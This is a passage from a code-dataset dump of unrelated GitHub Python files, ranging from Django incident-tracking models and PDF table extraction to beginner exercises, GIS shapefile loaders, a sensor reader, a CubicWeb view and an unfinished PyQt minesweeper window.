str(duration))\n return string\n\n def most_recent_update_by(self):\n \"\"\"\n Returns the id of the las user you created an update for the\n given Bulletin\n \"\"\"\n user_id = self.bulletin_comments.values('status__user')\\\n .order_by('-comment_created')\n return user_id\n\n def most_recent_status_bulletin(self):\n \"\"\"\n This method returns the most recent status for a given Bulletin event.\n It is used by Django Haystack in construction of the Solr Index.\n \"\"\"\n\n status = self.bulletin_comments.values('status__status_en')\\\n .order_by('-comment_created')\n if len(status) > 0:\n status = status[0]\n return status['status__status_en']\n else:\n return ''\n\n\nclass Incident(models.Model):\n \"\"\"\n This class defined the Incident object Model. The\n object is intended to capture the meta level relationship between\n Bulletins, Actors and Events.\n \"\"\"\n incident_details_en = models.TextField(blank=True, null=True)\n incident_details_ar = models.TextField(blank=True, null=True)\n confidence_score = models.IntegerField(\n 'confidence score', blank=True, null=True)\n title_en = models.TextField()\n title_ar = models.TextField(blank=True)\n incident_created = models.DateTimeField(auto_now_add=True)\n incident_modified = models.DateTimeField(auto_now=True)\n\n assigned_user = models.ForeignKey(User, blank=True, null=True)\n\n incident_comments = models.ManyToManyField(Comment, blank=True)\n ref_bulletins = models.ManyToManyField(Bulletin, blank=True)\n actors_role = models.ManyToManyField(ActorRole, blank=True)\n crimes = models.ManyToManyField(CrimeCategory, blank=True)\n labels = models.ManyToManyField(Label, blank=True)\n times = models.ManyToManyField(TimeInfo, blank=True)\n locations = models.ManyToManyField(Location, blank=True)\n ref_incidents = models.ManyToManyField('self', blank=True)\n \"\"\"\n This field tracks whether the entitiy has been deleted and should thus be\n ignored by the UI\n \"\"\"\n deleted = models.BooleanField(default=False)\n\n def __unicode__(self):\n return self.title_en\n\n def get_time_length(self):\n \"\"\"\n This method returns the time range for a given Incident event.\n It is used by Django Haystack in construction of the Solr Index.\n \"\"\"\n time = self.times.aggregate(\n lowest=Min('time_from'), highest=Max('time_to'))\n string = ''\n\n if(len(time) > 0):\n if time[\"lowest\"] is not None and time[\"highest\"] is not None:\n duration = (time[\"highest\"] - time[\"lowest\"]).days\n date_duration = time[\"lowest\"].strftime('%Y/%m/%d') + '→'\\\n + time[\"highest\"].strftime('%Y/%m/%d')\n string = '{0}' +\\\n '({1} days)'\n string = string.format(date_duration, str(duration))\n return string\n\n def most_recent_update_by(self):\n \"\"\"\n Returns the id of the las user you created an update for\n the given Incident\n \"\"\"\n user_id = self.incident_comments.values('status__user')\\\n .order_by('-comment_created')\n return user_id\n\n def most_recent_status_incident(self):\n \"\"\"\n This method returns the most recent status for a given Incident event.\n It is used by Django Haystack in construction of the Solr Index.\n \"\"\"\n status = self.incident_comments.values(\n 'status__status_en').order_by('-comment_created')\n if len(status) > 0:\n status = status[0]\n return status['status__status_en']\n else:\n return ''\ndef update_last_logout(sender, request, user, **kwargs):\n \"\"\"\n A signal receiver which updates the last_logout date for\n the user logging out.\n \"\"\"\n logout_timestamp = timezone.now()\n if 'lastRequest' in request.session:\n logout_timestamp = request.session['lastRequest']\n del request.session['lastRequest'] \n \n\n ul = UserLog( )\n ul.login = user.last_login\n ul.logout = logout_timestamp\n try:\n logged_time = logout_timestamp - user.last_login\n ul.total_seconds = logged_time.total_seconds()\n except:\n pass #avoid #20 error for now: TypeError: unsupported operand type(s) for -: 'datetime.datetime' and 'NoneType'\n ul.user = user\n ul.save()\n\nuser_logged_out.connect(update_last_logout)\n","repo_name":"equalitie/open-corroborator","sub_path":"corroborator_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":41707,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"73716360805","text":"import os\nimport shutil\n\nROOT_DIR = '.awsm'\nKEYS_PATH = 'keys.yml'\nPROFILES_PATH = 'profiles.yml'\nHOOKS_PATH = 'hooks.yml'\n\nUSER_CFG_DIR = os.path.expanduser(os.path.join('~', ROOT_DIR))\nUSER_KEYS_CFG = os.path.join(USER_CFG_DIR, KEYS_PATH)\nUSER_PROFILES_DIR = os.path.join(USER_CFG_DIR, 'profiles')\nUSER_HOOKS_DIR = os.path.join(USER_CFG_DIR, 'hooks')\n\nPROJECT_CFG_DIR = os.path.join(os.getcwd(), ROOT_DIR)\nPROJECT_IDENTITY = os.path.join(PROJECT_CFG_DIR, 'identifier')\nPROJECT_TAGS = os.path.join(PROJECT_CFG_DIR, 'tags.yml')\nPROJECT_PROFILES_CFG = os.path.join(os.getcwd(), PROFILES_PATH)\nPROJECT_HOOKS_CFG = os.path.join(os.getcwd(), HOOKS_PATH)\n\n\n##\n## Run this when any of the above paths are imported\n##\ndef _init_awsm_user_config():\n # Skip initialization if the user directory has already been initialized\n if os.path.exists(USER_CFG_DIR):\n return\n\n base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n templates_root = os.path.join(base_dir, 'templates')\n\n # Make the root user directories, if necessary\n for d in (\n USER_CFG_DIR,\n USER_PROFILES_DIR,\n USER_HOOKS_DIR,\n ):\n os.makedirs(d, exist_ok=True)\n\n # Add the default config files\n for cfg, dest_dir in (\n (KEYS_PATH, None),\n (PROFILES_PATH, USER_PROFILES_DIR),\n (HOOKS_PATH, USER_HOOKS_DIR),\n ):\n dst = (\n os.path.join(USER_CFG_DIR, cfg)\n if dest_dir is None else\n os.path.join(dest_dir, 'main.yml')\n )\n\n if not os.path.exists(dst):\n src = os.path.join(templates_root, cfg)\n shutil.copyfile(src, dst)\n\n_init_awsm_user_config()\n","repo_name":"jeevb/awsm","sub_path":"awsm/storage/file_storage.py","file_name":"file_storage.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2123398430","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\nimport sys, os, pickle\nimport urllib.request\nimport pandas as pd\nfrom PyPDF2 import PdfFileWriter\nfrom PyPDF2 import PdfFileReader\nfrom tabula import convert_into\nfrom bs4 import BeautifulSoup\n\ndef html_mark_index(file_path):\n global m\n page = urllib.request.urlopen(\"file://\" + file_path).read()\n soup = BeautifulSoup(page, \"lxml\")\n try:\n if soup.find_all(class_=\"me\")[-1].contents[0] in \"※○◎△★\":\n m = soup.find_all(class_=\"me\")\n elif soup.find_all(class_=\"m3\")[-1].contents[0] in \"※○◎△★\":\n m = soup.find_all(class_=\"m3\")\n except:\n print(\"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\")\n\n m = list(filter(lambda x : x.contents[0][0] in \"※○◎△★\", m))\n m = m[2:]\n return m\n\ndef crop_pdf(file_path,x,y):\n input_f = PdfFileReader(open(file_path,\"rb\"))\n output_f = PdfFileWriter()\n\n numPages = input_f.getNumPages()\n\n sx = 39.66\n sy = y\n output_path = file_path.replace(\".pdf\", \"_crp.pdf\")\n output_path = output_path.replace(\"split\", \"crop\")\n\n for i in range(numPages):\n page = input_f.getPage(i)\n print(page.mediaBox.getUpperRight_x(), page.mediaBox.getUpperRight_y())\n tx = page.mediaBox.getUpperRight_x()\n ty = page.mediaBox.getUpperRight_y()\n\n top = ty - sy - 24\n left = sx + 371\n\n bottom = top - 159\n right = left + 305\n\n page.mediaBox.loweLeft = (left,bottom)\n page.mediaBox.upperRight = (right, top)\n page.trimBox.lowerLeft = (left, bottom)\n page.trimBox.upperRight = (right, top)\n page.cropBox.lowerLeft = (left, bottom)\n page.cropBox.upperRight = (right, top)\n output_f.addPage(page)\n\n outputStream = open(output_path, \"wb\")\n output_f.write(outputStream)\n outputStream.close()\n return output_path\n\ndef convert_table(file_path):\n output_path = file_path.replace(\".pdf\", \".csv\")\n output_path = output_path.replace(\"crop\", \"table\")\n convert_into(file_path, output_path, output_format='csv')\n# def html_record_index(file_path):\n# page = urllib.request.urlopen(\"file://\" + file_path).read()\n# soup = BeautifulSoup(page, \"lxml\")\n# r = soup.find(string=\"훈련자별 입상률(%)\")\n# for rr in r.find_parent(\"div\")[\"class\"]:\n# if 'h' in rr:\n# record_key = rr\n# else:\n# None\n# r = soup.find_all(class_=record_key)\n# return r\n # try:\n # if soup.find_all(class_=\"me\")[-1].contents[0] in \"※○◎△★\":\n # m = soup.find_all(class_=\"me\")\n # elif soup.find_all(class_=\"m3\")[-1].contents[0] in \"※○◎△★\":\n # m = soup.find_all(class_=\"m3\")\n # else:\n # m = soup.find_all(class_=\"m3\")\n # except:\n # print(\"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\")\n # r = soup.find_all(class_=\"m15\")\n # for rr in r:\n # print(rr)\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print('Warning')\n sys.exit()\n src_folder = sys.argv[1]\n\n pd\n\n table_txt_path = src_folder +\"/table.txt\"\n\n with open(table_txt_path,\"rb\") as f:\n table_path = pickle.load(f)\n\n for tab in table_path:\n table_html_path =tab.replace(\".pdf\", \".html\").replace(\"split\", \"html\")\n print(html_mark_index(table_html_path))\n # html_record_index(table_html_path)\n # except:\n # print(\"something is wrong\")","repo_name":"azurahi/entrophy_lab","sub_path":"kmmh/kmmh_table.py","file_name":"kmmh_table.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1442632065","text":"name=input(\"Enter your name\")\nage=int(input(\"Enter your age\"))\nif(age<3):\n print(name.title()+\",you are free to go\")\nelif(age<=12):\n print(name.title()+\"ticket costs 10 dollars\")\nelif(age>12):\n print(name.title()+\"ticket costs 15 dollars\")\n \n \nprint(\"Enjoy the movie\") \ntop=\"\"\ntomato=False\nwhile(top!='q'):\n top=input(\"enter a topping\")\n if(top=='tomato'):\n continue\n else:\n print(top.title()+\"is added\") \n break\nactive=True\nwhile(active!=True):\n print(\"no\")\nelse: \n print(\"execute\") \nconfirmed=[]\nunconfirmed=['Harish','Selva','Gokul','Rahul','Rahul']\nnew=[]\nwhile(unconfirmed):\n c=unconfirmed.pop()\n confirmed.append(c)\n\nfor user in confirmed:\n\n print(user.title()+\"welcome\") \n\nwhile('Rahul'in confirmed):\n confirmed.remove('Rahul')\nconfirmed.sort(reverse=True)\nprint(confirmed) ","repo_name":"VarthanV/Basic-Python-Files","sub_path":"movie.py","file_name":"movie.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74783697765","text":"from cubicweb import _\n\nfrom logilab.common.textutils import unormalize\nfrom logilab.mtconverter import xml_escape\n\nfrom cubicweb.view import StartupView\nfrom cubicweb.predicates import match_user_groups, is_instance\nfrom cubicweb.schema import display_name\nfrom cubicweb.web import httpcache\nfrom cubicweb.web.views import uicfg\n\nclass ManageView(StartupView):\n \"\"\":__regid__: *manage*\n\n The manage view, display some information about what's contained by your\n site and provides access to administration stuff such as user and groups\n management.\n\n Regarding the section displaying link to entity type, notice by default it\n won't display entity types which are related to another one using a\n mandatory (cardinality == 1) composite relation.\n\n You can still configure that behaviour manually using the\n `indexview_etype_section` as explained in :mod:`cubicweb.web.uicfg`.\n \"\"\"\n __regid__ = 'manage'\n title = _('manage')\n http_cache_manager = httpcache.EtagHTTPCacheManager\n add_etype_links = ()\n skip_startup_views = set( ('index', 'manage', 'schema', 'owl', \n 'systempropertiesform', 'propertiesform',\n 'loggedout', 'login',\n 'cw.users-and-groups-management', 'cw.groups-management', \n 'cw.users-management', 'cw.sources-management',\n 'siteinfo', 'info', 'registry', 'gc',\n 'tree') )\n\n def call(self, **kwargs):\n \"\"\"The default view representing the instance's management\"\"\"\n self._cw.add_css('cubicweb.manageview.css')\n self.w(u'

    %s

    ' % self._cw.property_value('ui.site-title'))\n self.entities()\n self.manage_actions()\n self.startup_views()\n\n def manage_actions(self):\n allactions = self._cw.vreg['actions'].possible_actions(self._cw)\n if allactions.get('manage'):\n self.w(u'
     
    ')\n self.w(u'

    %s

    \\n' % self._cw._('Manage'))\n self.w(u'
      ')\n for action in allactions['manage']:\n self.w(u'
    • %s
    • ' % (\n action.url(), self._cw._(action.title)))\n self.w(u'
    ')\n\n def startup_views(self):\n views = [v for v in self._cw.vreg['views'].possible_views(self._cw, None)\n if v.category == 'startupview'\n and v.__regid__ not in self.skip_startup_views]\n if not views:\n return\n self.w(u'
     
    ')\n self.w(u'

    %s

    \\n' % self._cw._('Startup views'))\n self.w(u'
      ')\n for v in sorted(views, key=lambda x: self._cw._(x.title)):\n self.w('
    • %s
    • ' % (\n xml_escape(v.url()), xml_escape(self._cw._(v.title).capitalize())))\n self.w(u'
    ')\n\n def entities(self):\n schema = self._cw.vreg.schema\n eschemas = [eschema for eschema in schema.entities()\n if uicfg.indexview_etype_section.get(eschema) == 'application']\n if eschemas:\n self.w(u'
     
    ')\n self.w(u'

    %s

    \\n' % self._cw._('Browse by entity type'))\n self.w(u'')\n self.entity_types_table(eschemas)\n self.w(u'
    ')\n\n def entity_types_table(self, eschemas):\n infos = sorted(self.entity_types(eschemas),\n key=lambda t: unormalize(t[0]))\n q, r = divmod(len(infos), 2)\n if r:\n infos.append( (None, ' ', ' ') )\n infos = zip(infos[:q+r], infos[q+r:])\n for (_, etypelink, addlink), (_, etypelink2, addlink2) in infos:\n self.w(u'\\n')\n self.w(u'%s%s\\n' % (addlink, etypelink))\n self.w(u'%s%s\\n' % (addlink2, etypelink2))\n self.w(u'\\n')\n\n def entity_types(self, eschemas):\n \"\"\"return an iterator on formatted links to get a list of entities of\n each entity types\n \"\"\"\n req = self._cw\n for eschema in eschemas:\n if eschema.final or not eschema.may_have_permission('read', req):\n continue\n etype = eschema.type\n nb = req.execute('Any COUNT(X) WHERE X is %s' % etype)[0][0]\n if nb > 1:\n label = display_name(req, etype, 'plural')\n else:\n label = display_name(req, etype)\n url = self._cw.build_url(etype)\n etypelink = u' %s (%d)' % (\n xml_escape(url), label, nb)\n if eschema.has_perm(req, 'add'):\n yield (label, etypelink, self.add_entity_link(etype))\n else:\n yield (label, etypelink, u'')\n\n def create_links(self):\n self.w(u'
      ')\n for etype in self.add_etype_links:\n eschema = self._cw.vreg.schema.eschema(etype)\n if eschema.has_perm(self._cw, 'add'):\n url = self._cw.vreg[\"etypes\"].etype_class(etype).cw_create_url(self._cw)\n self.w(u'
    • %s
    • ' % (\n url, self._cw.__('New %s' % eschema).capitalize()))\n self.w(u'
    ')\n\n def add_entity_link(self, etype):\n \"\"\"creates a [+] link for adding an entity\"\"\"\n url = self._cw.vreg[\"etypes\"].etype_class(etype).cw_create_url(self._cw)\n return u'[+]' % (\n xml_escape(url), self._cw.__('New %s' % etype))\n\n\n\nclass IndexView(ManageView):\n \"\"\":__regid__: *index*\n\n The default index view, that you'll get when accessing your site's root url.\n It's by default indentical to the\n :class:`~cubicweb.web.views.startup.ManageView`, but you'll usually want to\n customize this one.\n \"\"\"\n __regid__ = 'index'\n title = _('view_index')\n","repo_name":"gurneyalex/cubicweb","sub_path":"cubicweb/web/views/startup.py","file_name":"startup.py","file_ext":"py","file_size_in_byte":6065,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"38167684991","text":"from math import floor\n\ncurrent_record = float(input())\ndistance_meters = float(input())\ntime_per_meter = float(input())\n\ntime_lost = floor(distance_meters / 15) * 12.5\n\ntime = distance_meters * time_per_meter + time_lost\n\nif time < current_record:\n print(f\"Yes, he succeeded! The new world record is {time:.2f} seconds.\")\nelse:\n print(f\"No, he failed! He was {time - current_record:.2f} seconds slower.\")\n","repo_name":"lubodonchev/SoftUni_Coursework","sub_path":"First_Project/SoftUni Basics January 2023/Conditional_Statements_Exercises/swimming.py","file_name":"swimming.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26163223830","text":"import math\n\nclass Line:\n def __init__(self, cord1, cord2):\n self.cord1 = {\n 'x': cord1[0],\n 'y': cord1[1]\n }\n self.cord2 = {\n 'x': cord2[0],\n 'y': cord2[1]\n }\n\n def distance(self):\n x = self.cord1['x'] - self.cord2['x']\n y = self.cord1['y'] - self.cord2['y']\n summary = (x * x) + (y * y)\n\n return abs(math.sqrt(summary))\n\n def slope(self):\n x = self.cord2['x'] - self.cord1['x']\n y = self.cord2['y'] - self.cord1['y']\n\n return abs(y/x)\n\n\ncord2 = (3, 2)\ncord1 = (8, 10)\n\nli = Line(cord1, cord2)\nprint(\"line distance: {}\".format(li.distance())) # 9.433981132056603\nprint(\"line slope: {}\".format(li.slope())) # 1.6\n\n\n#---------------------------------------------------------------------------\n\nclass Cylinder:\n\n pi = 3.14\n\n def __init__(self, height = 1, radius = 1):\n self.height = height\n self.radius = radius\n\n def volume(self):\n\n return self.radius ** 2 * self.pi * self.height\n\n def surface_area(self):\n\n return (self.pi * self.radius **2 );\n\nc = Cylinder(2, 3)\nprint(f\"Cylinder volume: {c.volume()}\")\nprint(f\"Cylinder surface_area: {c.surface_area()}\")\n","repo_name":"DTL625/udemy-course-code","sub_path":"Complete-Python-Bootcamp/CH8_OBJ/Obj-HomeWork.py","file_name":"Obj-HomeWork.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1558627643","text":"import os\nfrom django.contrib.gis.utils import LayerMapping \nfrom .models import counties, WordBorder\n\n\ncounties_mapping = {\n 'objectid': 'OBJECTID',\n 'area': 'AREA',\n 'perimeter': 'PERIMETER',\n 'county3_field': 'COUNTY3_',\n 'county3_id': 'COUNTY3_ID',\n 'county': 'COUNTY',\n 'shape_leng': 'Shape_Leng',\n 'shape_area': 'Shape_Area',\n 'geom': 'MULTIPOLYGON',\n}\n\nworld_shp = os.path.abspath(\n os.path.join(os.path.dirname(__file__), 'Data/counties', 'County.shp'),\n)\n\ndef run(verbose=True):\n lm = LayerMapping(\n counties, world_shp, counties_mapping,\n transform=False, encoding='iso-8859-1',\n )\n lm.save(strict=True, verbose=verbose)\n\nwordborder_mapping = {\n 'fips': 'FIPS',\n 'iso2': 'ISO2',\n 'iso3': 'ISO3',\n 'un': 'UN',\n 'name': 'NAME',\n 'area': 'AREA',\n 'pop2005': 'POP2005',\n 'region': 'REGION',\n 'subregion': 'SUBREGION',\n 'lon': 'LON',\n 'lat': 'LAT',\n 'geom': 'MULTIPOLYGON',\n}\n\nworld_shp2 = os.path.abspath(\n os.path.join(os.path.dirname(__file__), 'Data/world_borders', 'TM_WORLD_BORDERS-0.3.shp'),\n)\n\ndef run_border(verbose=True):\n lm = LayerMapping(\n WordBorder, world_shp2, wordborder_mapping,\n transform=False, encoding='iso-8859-1',\n )\n lm.save(strict=True, verbose=verbose)","repo_name":"MbuguaM/Datavi","sub_path":"lyser/loaders.py","file_name":"loaders.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38070441490","text":"# -*- coding:utf-8 -*-\n\n\n\n# global_dict = {}\n\n# def student_thread(name):\n# \tstd = Student(name)\n# \tglobal_dict[threading.current_thread()] = std\n# \tdo_task_1()\n# \tdo_task_2()\n\n# def do_task_1():\n# \tstd = global_dict[threading.current_thread()]\n\n# def do_task_2():\n# \tstd = global_dict[threading.current_thread()]\n\n\n\n\n# def process_student(name):\n# \tstd = Student(name)\n# \t#std 是全局变量,但是每个函数都需要调用它\n# \tdo_task_1(std)\n# \tdo_task_2(std)\n\n\n# def do_task_1(std):\n# \tdo_subtask_1(std)\n# \tdo_subtask_2(std)\n\n#---------------------------------------------------------\n# ThreadLocal\n\nimport threading\n\n#创建全局ThreadLocal变量\nlocal_school = threading.local()\n\ndef process_student():\n\tstd = local_school.student\n\tprint('Hello,%s in (%s)' % (std,threading.current_thread().name))\n\ndef process_thread(name):\n\t#绑定ThreadLocal的student\n\tlocal_school.student = name\n\tprocess_student()\n\n\nt1 = threading.Thread(target = process_thread,args = ('Alice',),name = 'Thread-A')\nt2 = threading.Thread(target = process_thread,args = ('Bob',),name = 'Thread-B')\nt1.start()\nt2.start()\nt1.join()\nt2.join()\nprint('Threads ended')","repo_name":"lierfengmei/pyworks","sub_path":"myThreadLocal.py","file_name":"myThreadLocal.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21135148369","text":"#! /usr/bin/python3\n\n#\n# This program prints the barometric pressure and temperature as determined by\n# a TE Connectivity MS5611 barometric presssure sensor connected via I2C. It\n# also calculates the current altitude above sea level.\n#\n# All of the work for interfacing with the sensor and doing the related\n# calculations has been encapuslated in a seperate module, ms5611.py.\n#\n\nimport smbus\nimport ms5611\n\nbus = smbus.SMBus(1)\n\n\nsensor = ms5611.MS5611(bus)\n\n# Read the pressure and temperature values from the sensor\ndata = sensor.poll()\n\nprint(f\"Pressure: {data[0]} mbar\\nTemperature: {data[1]} ℃\")\n\n# Reuse data when calculating altitude so that we don't have to poll the\n# sensor twice\naltitude = sensor.get_altitude(pressure=data[0], temp=data[1])\n\nprint(f\"Altitude: {round(altitude, 2)} m above sea level\")\n\n\nbus.close()\n\n","repo_name":"samueldewan/SYSC3010_samuel_dewan","sub_path":"Lab-2/lab2-hardware-step3.py","file_name":"lab2-hardware-step3.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32834348511","text":"import math\nimport networkx as nx\nfrom queue import PriorityQueue as PQueue\n\nclass node(object) :\n\tdef __init__(self, index, parent, g, h):\n\t\tself.index = index\n\t\tself.parent = parent\n\t\tself.g = g\n\t\tself.h = h\n\n\tdef setParent(self, parent):\n\t\tself.parent = parent\n \n\tdef setG(self, g):\n\t\tself.g = g\n \n\tdef setH(self, h):\n\t\tself.h = h\n\ndef cal_dist(p1, p2, pos):\n\treturn math.sqrt((pos[p1][0] - pos[p2][0])**2 + (pos[p1][1]-pos[p2][1])**2)\n\n\ndef shortest_path(airports, start, goal, pos) :\n\topen_queue = PQueue()\n\topen_dict = {}\n\tclose_dict = {}\n\tstart_h = cal_dist(start, goal, pos)\n\tstart_node = node(start, None, 0, start_h)\n\topen_queue.put((start_node.h + start_node.g, start_node))\n\topen_dict[start] = start_node\n\n\twhile goal not in close_dict and not open_queue.empty():\n\t\tfind_path(airports, open_queue, open_dict, close_dict, goal, pos)\n\n\tpath = []\n\n\tif goal in close_dict:\n\t\tcurrent_node = close_dict[goal]\n\t\twhile current_node.parent != None:\n\t\t\tpath.append(current_node.index)\n\t\t\tcurrent_node = current_node.parent\n\t\tpath.append(start)\n\t\tpath = [path[len(path) - i -1] for i in range(len(path))]\n\treturn path\n\n\n\ndef find_path(airports, open_queue, open_dict, close_dict, goal, pos) :\n\tcurrent_node = open_queue.get()[1]\n\topen_dict.pop(current_node.index)\n\troads = list ( nx.neighbors(airports, current_node.index ) )\n\tupdate_node = False\n\tfor i in roads :\n\t\tif i not in close_dict :\n\t\t\tdistance = cal_dist(i, current_node.index, pos)\n\t\t\tnew_g = current_node.g + distance\n\t\t\tif i in open_dict :\n\t\t\t\tif new_g < open_dict[i].g :\n\t\t\t\t\topen_dict[i].parent = current_node\n\t\t\t\t\topen_dict[i].g = new_g\n\t\t\t\t\tupdate_node = True\n\n\t\t\telse :\n\t\t\t\tnew_h = cal_dist(i, goal, pos)\n\t\t\t\tnew_node = node(i, current_node, new_g, new_h)\n\t\t\t\topen_dict[i] = new_node\n\t\t\t\topen_queue.put((new_node.h + new_node.g, new_node))\n\n\tif update_node:\n\t\topen_queue = PQueue()\n\t\tfor v in open_dict.values():\n\t\t\topen_queue.put((v.h + v.g, v))\n\n\tclose_dict[current_node.index] = current_node\n\n","repo_name":"ryansxl/dynamic-path-planning","sub_path":"final/jingtai1.py","file_name":"jingtai1.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19074226300","text":"import pygame\r\nfrom PyQt6.QtWidgets import (\r\n QWidget, QMainWindow,\r\n QGridLayout, QVBoxLayout, QFormLayout,\r\n QLabel, QLCDNumber, QDialog,\r\n QPushButton, QSpinBox, QRadioButton, QCheckBox,\r\n QSpacerItem, QSizePolicy, QFrame\r\n)\r\nfrom PyQt6.QtCore import Qt, QSize\r\nfrom PyQt6.QtGui import QMouseEvent, QCloseEvent, QAction, QActionGroup, QIcon\r\nfrom tools import Difficulty\r\nimport configparser\r\nimport sys\r\n# Константы ------------------------------------------------------------------------------------------------------------\r\nconfig = configparser.ConfigParser()\r\nconfig.read('config.ini')\r\n\r\ncell_size = int(config['DEFAULT']['cell_size'])\r\npaddings = int(cell_size / 3)\r\npanel_size = int(cell_size * 1.5)\r\nLCD_width = int(cell_size * 2.5)\r\nB_size = int(cell_size * 1.3)\r\nw_max = int(config['DEFAULT']['w_max'])\r\nh_max = int(config['DEFAULT']['h_max'])\r\n\r\n# LCDCounter -----------------------------------------------------------------------------------------------------------\r\nclass LCDCounter(QLCDNumber):\r\n def __init__(self, count=0) -> None:\r\n super(LCDCounter, self).__init__()\r\n self.setMinimumSize(LCD_width, panel_size)\r\n self.setMaximumWidth(LCD_width)\r\n self.setDigitCount(3)\r\n self.__value__ = count\r\n self.displayLCD()\r\n def __add__(self, n: (int, float)) -> float:\r\n return self.__value__ + n\r\n def __sub__(self, n: (int, float)) -> float:\r\n return self.__value__ - n\r\n def __int__(self) -> int:\r\n return int(self.__value__)\r\n\r\n def clear(self) -> None:\r\n self.__value__ = 0\r\n self.displayLCD()\r\n def set(self, n: int) -> None:\r\n self.__value__ = n\r\n self.displayLCD()\r\n def displayLCD(self) -> None:\r\n if self.__value__ < 0:\r\n raise ValueError\r\n elif self.__value__ > 1000:\r\n self.display('999')\r\n else:\r\n self.display(str(int(self.__value__)).zfill(3))\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# Диалог для ввода пользовательских настроек ---------------------------------------------------------------------------\r\nclass InputDifficulty(QDialog):\r\n def __init__(self, win, cur_diff: Difficulty):\r\n super(InputDifficulty, self).__init__()\r\n self.win = win\r\n\r\n self.setWindowTitle('Set Custom Difficulty')\r\n self.setModal(True)\r\n self.setFixedSize(300, 400)\r\n\r\n self.Layout = QVBoxLayout()\r\n for name in ['Easy start', 'Open accord', 'Set accord', 'Inform flag', 'NF mode']:\r\n check = QCheckBox()\r\n check.setText(name)\r\n if config['SETTINGS'][name.lower().replace(' ', '_')] == 'True': check.setCheckState(Qt.CheckState.Checked)\r\n self.Layout.addWidget(check)\r\n\r\n separator = QFrame()\r\n separator.setFrameShape(QFrame.Shape.HLine)\r\n separator.setFrameShadow(QFrame.Shadow.Sunken)\r\n self.Layout.addWidget(separator)\r\n\r\n for name in ['Easy', 'Normal', 'Hard', 'Custom']:\r\n option = QRadioButton()\r\n option.setText(name)\r\n self.Layout.addWidget(option)\r\n if name == 'Easy':\r\n option.setChecked(True)\r\n if name == 'Custom':\r\n self.form = QFormLayout()\r\n self.form.setSpacing(10)\r\n option.toggled.connect(self.switch_difficulty)\r\n for field in ['Height', 'Width', 'Mines']:\r\n spin = QSpinBox()\r\n spin.setEnabled(False)\r\n if field == 'Mines': spin.setMinimum(2)\r\n else: spin.setMinimum(8)\r\n spin.setMaximum(1000)\r\n spin.setPrefix(field + ': ')\r\n spin.valueChanged.connect(self.check_value)\r\n self.form.addWidget(spin)\r\n self.Layout.addLayout(self.form)\r\n self.setLayout(self.Layout)\r\n\r\n confirm_btn = QPushButton(\"Confirm\")\r\n confirm_btn.clicked.connect(self.confirm)\r\n self.Layout.addWidget(confirm_btn)\r\n\r\n def switch_difficulty(self):\r\n name = self.sender().text()\r\n for i in range(self.form.count()):\r\n self.form.itemAt(i).widget().setEnabled(False)\r\n if name == 'Custom':\r\n self.form.itemAt(i).widget().setEnabled(True)\r\n\r\n def check_value(self):\r\n name = self.sender().prefix()[:-4]\r\n value = self.sender().value()\r\n if name == 'Height' and value > h_max: value = h_max\r\n if name == 'Width' and value > w_max: value = w_max\r\n if name == 'Mines':\r\n w = self.sender().parent().form.itemAt(0).widget().value()\r\n h = self.sender().parent().form.itemAt(1).widget().value()\r\n if value > w * h - 9: value = w * h - 9\r\n self.sender().setValue(value)\r\n\r\n def confirm(self):\r\n difficulty = None\r\n for i in range(6, 10):\r\n if self.Layout.itemAt(i).widget().isChecked():\r\n name = self.Layout.itemAt(i).widget().text()\r\n if name != 'Custom':\r\n difficulty = name.lower()\r\n else:\r\n difficulty = []\r\n for j in range(self.form.count()):\r\n difficulty.append(str(self.form.itemAt(j).widget().value()))\r\n difficulty = ', '.join(difficulty)\r\n\r\n config.set('SETTINGS', 'difficulty', difficulty)\r\n for i in range(5):\r\n name = self.Layout.itemAt(i).widget().text().replace(' ', '_')\r\n if self.Layout.itemAt(i).widget().isChecked():\r\n config.set('SETTINGS', name, 'True')\r\n else:\r\n config.set('SETTINGS', name, 'False')\r\n\r\n with open('config.ini', 'w') as configfile:\r\n config.write(configfile)\r\n self.win.__difficulty__ = Difficulty(config['SETTINGS']['difficulty'])\r\n self.close()\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# Кнопка рестарта ------------------------------------------------------------------------------------------------------\r\nclass RestartButton(QPushButton):\r\n def __init__(self):\r\n super(RestartButton, self).__init__()\r\n self.setFixedSize(B_size, B_size)\r\n self.setCheckable(True)\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# Сапер ----------------------------------------------------------------------------------------------------------------\r\nclass MSWindow(QMainWindow):\r\n def __init__(self):\r\n self.__mouse_event__ = None\r\n self.__need_to_restart__ = False\r\n self.__game_state__ = -1\r\n self.__difficulty_input__ = InputDifficulty(self, 